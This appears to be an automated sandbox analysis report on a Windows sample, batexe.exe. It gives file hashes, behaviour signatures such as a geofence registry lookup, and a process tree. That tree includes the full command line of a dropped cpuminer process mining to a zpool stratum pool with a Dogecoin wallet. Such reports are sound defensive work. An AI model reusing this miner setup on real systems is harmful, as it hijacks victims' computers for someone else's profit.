Analysis
-
max time kernel
301s -
max time network
314s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19/02/2024, 15:59
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2832 b2e.exe 5432 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 5432 cpuminer-sse2.exe 5432 cpuminer-sse2.exe 5432 cpuminer-sse2.exe 5432 cpuminer-sse2.exe 5432 cpuminer-sse2.exe 5432 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5472-1-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5472 wrote to memory of 2832 5472 batexe.exe 85 PID 5472 wrote to memory of 2832 5472 batexe.exe 85 PID 5472 wrote to memory of 2832 5472 batexe.exe 85 PID 2832 wrote to memory of 4968 2832 b2e.exe 86 PID 2832 wrote to memory of 4968 2832 b2e.exe 86 PID 2832 wrote to memory of 4968 2832 b2e.exe 86 PID 4968 wrote to memory of 5432 4968 cmd.exe 89 PID 4968 wrote to memory of 5432 4968 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\54D2.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\54D2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\54D2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\74AE.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5432
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD59e406b77a591fa5892e99f0d214e0cf1
SHA1f3130e13eea546e86ac855fbedbebca0c90a7cdb
SHA2561d828ad46280e908e988c7057090dfbeb8237625a9fbf5cf64f8d5d46fa7af64
SHA512145f0520fd28e8be7831f2bbc0749d9edf3dc6e8e7fd6d942c27203934ed19ce429931d414399d6bf5a6c909f7a224394e935609f552584b8ca06cf8dd7a14b6
-
Filesize
398KB
MD5d541e0d3fb44d3255d5422b796749d6a
SHA16bda9f66624fc40c8cb9f5fbaee2edbd229bf6ca
SHA2560a84e329f263ce09d6db481fdeccf62b34cd57080960030618861604a2a0d528
SHA512870a2fc94716cc61788e424108f0e94e9d1fc084b07bddc6c6fd96476b46ac9de414f49023a04ea247a503325331a9d2506b37e7ce51fad836270ca17a124de0
-
Filesize
422KB
MD5c79c4326aa9a997b1c6fd1813d0d3a72
SHA1175a38072f2fc2b68a62bdbee129d46b2a517338
SHA25685990b6c923082dc0bdf55d544f78048c56fdac9edfeff400b82767cd403ba61
SHA5121702ecade82562ea98f58375aa417b2e8e320e886f49e4b7eb19f4f73ee6bbc852de8407d819a817cdd06286edb9a0072ebf38d14de4ef117ed38ad086a91b0e
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
438KB
MD5a3eeb070a881306c3c90f9bea2b52849
SHA1360974dc2d7e83e860c016470487f8998e27c781
SHA256e705c0dd900485ddc2fca16336c1260af9dd8bbf73cb8afd5bffdab94286221c
SHA512477e9ec1ff54e0ce5f47e7642f45a1b192ac968c195f47c2c06562894b14f9cd89caf9aceaf0742f5dfacdb7ad0dae6cd2897072df3ae8e825b736c039437e2b
-
Filesize
370KB
MD507c099cbf79f9f075beacbd4f7255793
SHA1fa59febd30a7c62186033f7515630a823bd968fd
SHA256fa0e02dcf45b2d293f7b157c14fbac2bd8d9cd47e2c4cc78441db7aa4d1da6c9
SHA512eda75b081339aed93360f8788b42a1db6a3ce058d24e35a6599010239ef8a838b3fca0bd4d63ed11d832ac9a331ac22f6f8f702a0a3f07b550aac96333253d92
-
Filesize
182KB
MD5bf7112f3d3b4fd5016ac4a6842b513af
SHA17bf4e40058bdd1699d1b7f73c747c7ff3b35f29a
SHA256273c31efb8667bbd10bda50c42b0b86f54a39ae2213e4a8db30049093707cd5f
SHA5129f7ff6fcc3af0ec80049fe855c0114045945d511ebc69ef8dff60add240aa0deb08d0e334b8046c43cb96f24d88fe2afc6816b5fad9b4a020885cc0f88b7de10
-
Filesize
197KB
MD5190612499421b8087e7fa2fb8941e79c
SHA10362387d630c15410b43bc399dbe3bb5c08363e3
SHA256f36ecaebb28f6999db5df8169857fe37b5b6202fc80cf52eed62aa6c5c55d7a4
SHA512dcfc528601520dfa2702dc7aea4d216211cc4348f78dfa2f6f6efa4b2b85341fa96d38dc8bd619d15d2535cb630e3dce9e7d705ed3cf3cdd13b1957ca3e1f705
-
Filesize
301KB
MD5424bbead14cb39454f9ede14326fe6fa
SHA10264c85817b6a7db8dc0c651df04e4189b8d0478
SHA2567b9bf401019a0c184dd9ffd541cdef24f6820cef00f3c9b4ce5afdff33531020
SHA512e3e83100c0818799c9964a2d594103fa2ccfc5ec035461efdb4d65fa50963de8c70a5da91afdda704a35cff9f5947426c917d6cede22682f258d41c744b7e059
-
Filesize
312KB
MD5da7606a9315a25b02a4585784d11caef
SHA1581b6337342cf7c07b68a13a7a3ddb84c161a2e3
SHA2561bbc700b16acd6b6cdcc513f8617e123ff000eba7370b4896e6352aa422327ae
SHA512834bf0c93688aead48129bf5842e8904b9fca119eba97d0c6e2eb614a2d06f140b685db0e593706ddca3fbee5888fe384e2c73ce59d9378e11478212633df0ff
-
Filesize
278KB
MD52cc72f5131897a36ebe698c12de4f4f5
SHA1fcf05d44eb08581e9cef4a70613e4e38edff6501
SHA2564d82725fb6e036ec017f0600837536898efc3e5ce4a36bf73ecb92bf76fd5d12
SHA51267a075ce18394a0caace5a9473471ba684ea058088d7922177c8cc07b6f1c77f64c436f4f0ddf77dc1c6605cbf5875f410759859209a02af42b7ba9d4298330c
-
Filesize
299KB
MD505874f8812847a15bf464ea53fe526a2
SHA1407ab40f08700b40891e75292eea11da946a3b17
SHA2560ece53d28e01db64decd371cb01c4baa950d88cb6b69ae2d1560443b1bea5f90
SHA51291b157639298caaa314db558b34b3ea79b674da495fd1e04d1b16105be5ae8760f3e782df9fe42924de057268cfa40ac2a7b7e4a5659c75b19d35f03865659e7
-
Filesize
413KB
MD5e6fdcd0a0c365cf37eec75c95e22bfd2
SHA18349f2b7baa699d743ac911babfd137ca36ebba3
SHA256153dd10eb57d7ef5608dc3ff320e24abb311393f8cdcce972cbfc6c11111d3f2
SHA5128741845ca5bde14d9074781a4236f816cee975d88fe00e696d6b87494b0c198ba40515a85fab8acd3540ecf92961a14f3983c0e29170a7c065f88c3835f71457
-
Filesize
85KB
MD5a369296b578ae864dd5874b2959b3b93
SHA10b01ad28dc0d208984f68623ee33ec3efad93d67
SHA256d73b55a764ca7ca42b36a9c4610382bea77b474d30aa9a723974c955454bf4a1
SHA512aef0e2bdbedca33ac73274f209ff346650d9de69d0730bc5d42bc2240f850470a70ac957ef182089f60beaa0db671e0eb55b3eb1413ed5df29304e86e1b46536
-
Filesize
153KB
MD5f276be48a7e80f47611ad06559286f48
SHA1972f08ba1c836412627a37feb1f08d7d383e6021
SHA256ef7218d83c6a5416c16fd82ff71c47edabc1de0e12a439d8c89f3fe8990b8dd2
SHA512d22d645c38a109dd95bb48c7eec2204c110f9b159e5921f77037f9e297ea2d46c537733d917a8bb612100bc2b7f7bb2067ab8500bf810683e899f7445afd38a9
-
Filesize
96KB
MD53aff9a6e042b10ba6d881e1fd12d20e1
SHA16d2d520b117a034cbd0fdcda93c71569ceeb52dc
SHA25660a0d950810acd0de49f22a8d381595cead015e38090b6f54140de06fe06c7c0
SHA51215033f00b0599af92f2f584b16c86a679b4cfe7866c74db666ddff92edcbc8a9e62ca615fae7e8e7152f290e684931ed83ce9f71c49577639657b79d3c29202c